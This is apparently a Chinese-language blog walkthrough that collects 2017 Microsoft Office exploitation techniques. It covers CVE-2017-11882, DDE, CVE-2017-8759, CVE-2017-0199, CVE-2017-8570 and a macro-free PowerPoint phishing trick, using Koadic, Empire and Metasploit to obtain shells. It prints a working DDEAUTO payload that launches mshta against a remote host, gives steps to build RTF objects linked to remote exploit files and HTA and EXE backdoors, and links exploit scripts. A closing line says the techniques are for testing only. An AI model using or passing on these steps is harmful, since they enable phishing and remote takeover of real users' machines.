大家好久不见,最近office又爆出漏洞CVE-2017-11882,身为地地道道的中国人岂能不凑热闹。之前又看到了不少类似的文章,我就把近期比较好玩的有关office的漏洞利用姿势做个合集!
参考链接:
CVE-2017-11882
https://github.com/Ridter/CVE-2017-11882
https://evi1cg.me/archives/CVE_2017_11882_exp.html
http://www.freebuf.com/vuls/154462.html
DDE
http://www.freebuf.com/articles/system/153105.html
http://www.freebuf.com/articles/terminal/150285.html
http://bobao.360.cn/learning/detail/4592.html
CVE-2017-8759
https://github.com/vysec/CVE-2017-8759
https://bbs.77169.com/forum.php?mod=viewthread&tid=364738
CVE-2017-0199
http://www.91ri.org/16953.html
CVE-2017-8570
http://www.freebuf.com/vuls/144054.html
https://github.com/tezukanice/Office8570
Koadic
https://github.com/zerosum0x0/koadic
Empire
https://github.com/EmpireProject/Empire
1.我们先看最新的CVE-2017-11882漏洞,首先使用大宝剑建立链接
PS:大宝剑获取非英文版系统的shell会有报错
UnicodeDecodeError:‘ascii’ codec can’t decode byte0xe5 in position 108: ordinal not in ran
解决办法就是在koadic文件中增加utf-8编码
之后使用exp脚本生成文档
复制测试!获得会话!!
宿主进程状态
2.office的DDE应该不用多说了吧,直接开搞
新建word文档,按下CTRL+F9
在其中插入
DDEAUTO c:\\windows\\system32\\cmd.exe “/k mshta
http://192.168.188.147:66/LaLHL”
保存即可!然后打开测试!
获得会话!
宿主进程状态
更多姿势:http://bobao.360.cn/learning/detail/4592.html
3.CVE-2017-8759的复现,这个漏洞本身是.NET的问题……话不说直接开干!
在kali中使用Empire生成HTA后门
修改exploit.txt文件
开启apache或者使用python-m SimpleHTTPServer建立链接
并且把HTA上传到同一路径下。
然后使用word新建一个rtf,插入一个链接到文件的对象http://192.168.1.118:808/exploit.txt
然后使用C32编辑blob.bin,修改位置如下
右键拷贝HEX格式所有,使用编辑器打开rtf文件替换代码
再将objautlink前插入objupdate
保存修改后我们测试一下效果!
(o゜▽゜)o☆[BINGO!]
4.CVE-2017-0199的话就更简单了…
下载漏洞利用脚本
wget https://raw.githubusercontent.com/nixawk/metasploit-framework/3d082814cbedc065f329498b9c6fb7951f8ebbd5/modules/exploits/windows/fileformat/office_word_hta.rb
然后移动rb脚本到/usr/share/metasploit-framework/modules/exploits/windows/fileformat,然后打开msf生成hta文件链接
然后使用刚才下载的exp设置参数
Run后复制文件到靶机测试
查看会话
5.CVE-2017-8570同样还是一梭子搞定!
使用脚本生成恶意ppsx文件
使用msfvenom生成exe后门
再次使用脚本建立链接
打开msf建立监听
复制文件测试!获得会话!!
最后再普及一个姿势!
无需加载宏之PPTX钓鱼
首先新建一个PPT,插入内容
勾选文字插入动作
鼠标移过时的动作,选择运行程序
这里咱们插入一段powershell代码
之后把它插入到运行程序选项框里
确定保存就可以了,咱们测试一下。
当鼠标滑过…
(o゜▽゜)o☆[BINGO!]
PS:也可将动作插入到形状里面的空白动作按钮
然后覆盖全屏,并设置无线条无填充
攻防无绝对,技术无黑白
技术仅供测试使用,请勿用做非法用途!